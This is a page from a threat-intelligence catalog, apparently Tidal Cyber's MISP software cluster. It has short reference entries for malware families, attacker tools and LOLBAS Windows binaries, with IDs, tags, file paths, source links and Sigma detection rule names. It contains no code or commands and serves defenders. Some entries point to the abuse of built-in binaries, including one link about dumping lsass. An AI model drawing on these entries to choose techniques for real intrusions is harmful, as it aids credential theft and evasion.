Tidal Software
Tidal Software Cluster
Authors
| Authors and/or Contributors |
|---|
| Tidal Cyber |
3PARA RAT
3PARA RAT is a remote access tool (RAT) programmed in C++ that has been used by Putter Panda. [CrowdStrike Putter Panda]
Internal MISP references
UUID 71d76208-c465-4447-8d6e-c54f142b65a4 which can be used as unique global reference for 3PARA RAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0066 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
4H RAT
4H RAT is malware that has been used by Putter Panda since at least 2007. [CrowdStrike Putter Panda]
Internal MISP references
UUID a15142a3-4797-4fef-8ec6-065e3322a69b which can be used as unique global reference for 4H RAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0065 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
7-Zip
7-Zip is a tool used to compress files into an archive.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 4665e52b-3c5c-4a7f-9432-c89ef26f2c93 which can be used as unique global reference for 7-Zip in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5023 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'c45ce044-b5b9-426a-866c-130e9f2a4427', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
AADInternals
AADInternals is a PowerShell-based framework for administering, enumerating, and exploiting Azure Active Directory. The tool is publicly available on GitHub.[AADInternals Github][AADInternals Documentation]
Internal MISP references
UUID 3d33fbf5-c21e-4587-ba31-9aeec3cc10c0 which can be used as unique global reference for AADInternals in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Azure AD', 'Office 365', 'Windows'] |
| software_attack_id | S0677 |
| source | MITRE |
| tags | ['c9c73000-30a5-4a16-8c8b-79169f9c24aa', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
ABK
ABK is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]
Internal MISP references
UUID 394cadd0-bc4d-4181-ac53-858e84b8e3de which can be used as unique global reference for ABK in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0469 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
AccCheckConsole
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Verifies UI accessibility requirements
Author: bohops
Paths: * C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe * C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe * C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\arm\AccChecker\AccCheckConsole.exe * C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\arm64\AccChecker\AccCheckConsole.exe
Resources: * https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340 * https://twitter.com/bohops/status/1477717351017680899
Detection: * Sigma: proc_creation_win_lolbin_susp_acccheckconsole.yml * IOC: Sysmon Event ID 1 - Process Creation * Analysis: https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340[AccCheckConsole.exe - LOLBAS Project]
Internal MISP references
UUID cce705c7-49f8-4b54-b854-fd4b3a32e6ff which can be used as unique global reference for AccCheckConsole in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5203 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
AccountRestore
AccountRestore is a .NET executable that is used to brute force Active Directory accounts. The tool searches for a list of specific users and attempts to brute force the accounts based on a password file provided by the user.[Security Joes Sockbot March 09 2022]
Internal MISP references
UUID 6bc29df2-195e-410c-ad08-f3661575492f which can be used as unique global reference for AccountRestore in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5059 |
| source | Tidal Cyber |
| tags | ['dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Action RAT
Action RAT is a remote access tool written in Delphi that has been used by SideCopy since at least December 2021 against Indian and Afghani government personnel.[MalwareBytes SideCopy Dec 2021]
Internal MISP references
UUID 202781a3-d481-4984-9e5a-31caafc20135 which can be used as unique global reference for Action RAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1028 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
adbupd
adbupd is a backdoor used by PLATINUM that is similar to Dipsind. [Microsoft PLATINUM April 2016]
Internal MISP references
UUID f52e759a-a725-4b50-84f2-12bef89d369e which can be used as unique global reference for adbupd in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0202 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
AddinUtil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: .NET Tool used for updating cache files for Microsoft Office Add-Ins.
Author: Michael McKinley @MckinleyMike
Paths: * C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe
Resources: * https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
Detection: * Sigma: proc_creation_win_addinutil_suspicious_cmdline.yml * Sigma: proc_creation_win_addinutil_uncommon_child_process.yml * Sigma: proc_creation_win_addinutil_uncommon_cmdline.yml * Sigma: proc_creation_win_addinutil_uncommon_dir_exec.yml[AddinUtil.exe - LOLBAS Project]
Internal MISP references
UUID 253f97c3-ba35-4064-8ec0-892872432214 which can be used as unique global reference for AddinUtil in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5082 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
AdFind
AdFind is a free command-line query tool that can be used for gathering information from Active Directory.[Red Canary Hospital Thwarted Ryuk October 2020][FireEye FIN6 Apr 2019][FireEye Ryuk and Trickbot January 2019]
Internal MISP references
UUID 70559096-2a6b-4388-97e6-c2b16f3be78e which can be used as unique global reference for AdFind in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0552 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '3a633b73-9c2c-4293-8577-fb97be0cda37', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
adplus
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Paths: * C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe * C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
Resources: * https://mrd0x.com/adplus-debugging-tool-lsass-dump/ * https://twitter.com/nas_bench/status/1534916659676422152 * https://twitter.com/nas_bench/status/1534915321856917506
Detection: * Sigma: proc_creation_win_lolbin_adplus.yml * IOC: As a Windows SDK binary, execution on a system may be suspicious[adplus.exe - LOLBAS Project]
Internal MISP references
UUID 3f229fe8-4d03-48ba-97b5-d7132510e090 which can be used as unique global reference for adplus in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5204 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
ADRecon
ADRecon is an open-source tool that can be used to gather a "holistic" view of a target Active Directory environment.[GitHub ADRecon]
Internal MISP references
UUID c227bea1-9996-49d6-97ca-10a2fc156747 which can be used as unique global reference for ADRecon in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5270 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Advanced IP Scanner
Advanced IP Scanner is a tool used to perform network scans and show network devices.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID ff0af6fd-e4a1-47c9-b4a1-7ce5074e089e which can be used as unique global reference for Advanced IP Scanner in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5024 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Advanced Port Scanner
Advanced Port Scanner is a tool used to perform network scans.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID f93b54cf-a17c-4739-a7af-4106055f868d which can be used as unique global reference for Advanced Port Scanner in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5006 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
AdvancedRun
AdvancedRun is a tool used to enable software execution under user-defined settings.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 7ef15943-8061-4941-b14e-9634c0b95d28 which can be used as unique global reference for AdvancedRun in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5025 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '7de7d799-f836-4555-97a4-0db776eb6932', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Advpack
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Utility for installing software and drivers with rundll32.exe
Author: LOLBAS Team
Paths: * c:\windows\system32\advpack.dll * c:\windows\syswow64\advpack.dll
Resources: * https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ * https://twitter.com/ItsReallyNick/status/967859147977850880 * https://twitter.com/bohops/status/974497123101179904 * https://twitter.com/moriarty_meng/status/977848311603380224
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml * Splunk: detect_rundll32_application_control_bypass___advpack.yml[Advpack.dll - LOLBAS Project]
Internal MISP references
UUID 6c82fc65-864a-4a8c-80ed-80a69920c44f which can be used as unique global reference for Advpack in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5187 |
| source | Tidal Cyber |
| tags | ['7a457caf-c3b6-4a48-84cf-c1f50a2eda27', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
ADVSTORESHELL
ADVSTORESHELL is a spying backdoor that has been used by APT28 from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. [Kaspersky Sofacy] [ESET Sednit Part 2]
Internal MISP references
UUID ef7f4f5f-6f30-4059-87d1-cd8375bf1bee which can be used as unique global reference for ADVSTORESHELL in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0045 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635', '16b47583-1c54-431f-9f09-759df7b5ddb7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Agent.btz
Agent.btz is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. [Securelist Agent.btz]
Internal MISP references
UUID f27c9a91-c618-40c6-837d-089ba4d80f45 which can be used as unique global reference for Agent.btz in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0092 |
| source | MITRE |
| tags | ['e809d252-12cc-494d-94f5-954c49eb87ce', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
AgentExecutor
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Intune Management Extension included on Intune Managed Devices
Author: Eleftherios Panos
Paths: * C:\Program Files (x86)\Microsoft Intune Management Extension
Resources:
Detection: * Sigma: proc_creation_win_lolbin_agentexecutor.yml * Sigma: proc_creation_win_lolbin_agentexecutor_susp_usage.yml[AgentExecutor.exe - LOLBAS Project]
Internal MISP references
UUID 27fa7573-c1d3-4857-8a45-ef501c8ea32c which can be used as unique global reference for AgentExecutor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5205 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Agent Tesla
Agent Tesla is a spyware Trojan written for the .NET framework that has been observed since at least 2014.[Fortinet Agent Tesla April 2018][Bitdefender Agent Tesla April 2020][Malwarebytes Agent Tesla April 2020]
Internal MISP references
UUID 304650b1-a0b5-460c-9210-23a5b53815a4 which can be used as unique global reference for Agent Tesla in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0331 |
| source | MITRE |
| tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Akira Ransomware
A ransomware binary designed to encrypt victim files. More details about the TTPs typically observed during Akira ransomware attacks can be found in the associated Group object, "Akira Ransomware Actors".
Internal MISP references
UUID 59d598a9-e115-4d90-8fef-096015afa8d4 which can be used as unique global reference for Akira Ransomware in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5280 |
| source | Tidal Cyber |
| tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '562e535e-19f5-4d6c-81ed-ce2aec544f09'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Amadey
Amadey is a Trojan bot that has been used since at least October 2018.[Korean FSI TA505 2020][BlackBerry Amadey 2020]
Internal MISP references
UUID f173ec20-ef40-436b-a859-fef017e1e767 which can be used as unique global reference for Amadey in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1025 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Anchor
Anchor is one of a family of backdoor malware that has been used in conjunction with TrickBot on selected high profile targets since at least 2018.[Cyberreason Anchor December 2019][Medium Anchor DNS July 2020]
Internal MISP references
UUID 9521c535-1043-4b82-ba5d-e5eaeca500ee which can be used as unique global reference for Anchor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'Windows'] |
| software_attack_id | S0504 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
ANDROMEDA
ANDROMEDA is commodity malware that was widespread in the early 2010's and continues to be observed in infections across a wide variety of industries. During the 2022 C0026 campaign, threat actors re-registered expired ANDROMEDA C2 domains to spread malware to select targets in Ukraine.[Mandiant Suspected Turla Campaign February 2023]
Internal MISP references
UUID 69aac793-9e6a-5167-bc62-823189ee2f7b which can be used as unique global reference for ANDROMEDA in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1074 |
| source | MITRE |
| type | ['malware'] |
Angry IP Scanner
Angry IP Scanner is a tool that adversaries are known to use to search for vulnerable RDP ports.[U.S. CISA Phobos February 29 2024]
Internal MISP references
UUID 8efa90ac-a894-467d-8633-16a44d270358 which can be used as unique global reference for Angry IP Scanner in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S5274 |
| source | Tidal Cyber |
| tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'cd1b5d44-226e-4405-8985-800492cf2865', 'e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
AnyDesk
AnyDesk is a tool used to enable remote connections to network devices.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 922447fd-f41e-4bcf-b479-88137c81099c which can be used as unique global reference for AnyDesk in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5007 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'fb06d216-f535-45c1-993a-8c1b7aa2111c', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
AppInstaller
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Tool used for installation of AppX/MSIX applications on Windows 10
Author: Wade Hickey
Paths: * C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
Resources: * https://twitter.com/notwhickey/status/1333900137232523264
Detection: * Sigma: dns_query_win_lolbin_appinstaller.yml[AppInstaller.exe - LOLBAS Project]
Internal MISP references
UUID 9fa7c759-172f-4ae3-ac3d-0070c3c4c439 which can be used as unique global reference for AppInstaller in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5083 |
| source | Tidal Cyber |
| tags | ['837cf289-ad09-48ca-adf9-b46b07015666', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
AppleJeus
AppleJeus is a family of downloaders initially discovered in 2018 embedded within trojanized cryptocurrency applications. AppleJeus has been used by Lazarus Group, targeting companies in the energy, finance, government, industry, technology, and telecommunications sectors, and several countries including the United States, United Kingdom, South Korea, Australia, Brazil, New Zealand, and Russia. AppleJeus has been used to distribute the FALLCHILL RAT.[CISA AppleJeus Feb 2021]
Internal MISP references
UUID cdeb3110-07e5-4c3d-9eef-e6f2b760ef33 which can be used as unique global reference for AppleJeus in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Windows'] |
| software_attack_id | S0584 |
| source | MITRE |
| tags | ['8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
AppleSeed
AppleSeed is a backdoor that has been used by Kimsuky to target South Korean government, academic, and commercial targets since at least 2021.[Malwarebytes Kimsuky June 2021]
Internal MISP references
UUID 9df2e42e-b454-46ea-b50d-2f7d999f3d42 which can be used as unique global reference for AppleSeed in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Android', 'Windows'] |
| software_attack_id | S0622 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Appvlp
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Application Virtualization Utility Included with Microsoft Office 2016
Author: Oddvar Moe
Paths: * C:\Program Files\Microsoft Office\root\client\appvlp.exe * C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
Resources: * https://github.com/MoooKitty/Code-Execution * https://twitter.com/moo_hax/status/892388990686347264 * https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/ * https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/
Detection: * Sigma: proc_creation_win_lolbin_appvlp.yml[Appvlp.exe - LOLBAS Project]
Internal MISP references
UUID 1328ae5d-7220-46bb-a7ee-0c5a31eeda7f which can be used as unique global reference for Appvlp in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5206 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Aria-body
Aria-body is a custom backdoor that has been used by Naikon since approximately 2017.[CheckPoint Naikon May 2020]
Internal MISP references
UUID 7ba79887-d496-47aa-8b71-df7f46329322 which can be used as unique global reference for Aria-body in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0456 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Arp
Arp displays and modifies information about a system's Address Resolution Protocol (ARP) cache. [TechNet Arp]
Internal MISP references
UUID 45b51950-6190-4572-b1a2-7c69d865251e which can be used as unique global reference for Arp in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S0099 |
| source | MITRE |
| tags | ['509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Aspnet_Compiler
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: ASP.NET Compilation Tool
Author: Jimmy (@bohops)
Paths: * c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe * c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Resources: * https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ * https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * Sigma: proc_creation_win_lolbin_aspnet_compiler.yml[Aspnet_Compiler.exe - LOLBAS Project]
Internal MISP references
UUID 42763dde-8226-4f31-a3ba-face2da84dd2 which can be used as unique global reference for Aspnet_Compiler in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5084 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
ASPXSpy
ASPXSpy is a Web shell. It has been modified by Threat Group-3390 actors to create the ASPXTool version. [Dell TG-3390]
Internal MISP references
UUID a0cce010-9158-45e5-978a-f002e5c31a03 which can be used as unique global reference for ASPXSpy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0073 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Astaroth
Astaroth is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America. It has been known publicly since at least late 2017. [Cybereason Astaroth Feb 2019][Cofense Astaroth Sept 2018][Securelist Brazilian Banking Malware July 2020]
Internal MISP references
UUID ea719a35-cbe9-4503-873d-164f68ab4544 which can be used as unique global reference for Astaroth in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0373 |
| source | MITRE |
| tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['malware'] |
AsyncRAT
AsyncRAT is an open-source remote access tool originally available through the NYANxCAT Github repository that has been used in malicious campaigns.[Morphisec Snip3 May 2021][Cisco Operation Layover September 2021][Telefonica Snip3 December 2021]
Internal MISP references
UUID d587efff-4699-51c7-a4cc-bdbd1b302ed4 which can be used as unique global reference for AsyncRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
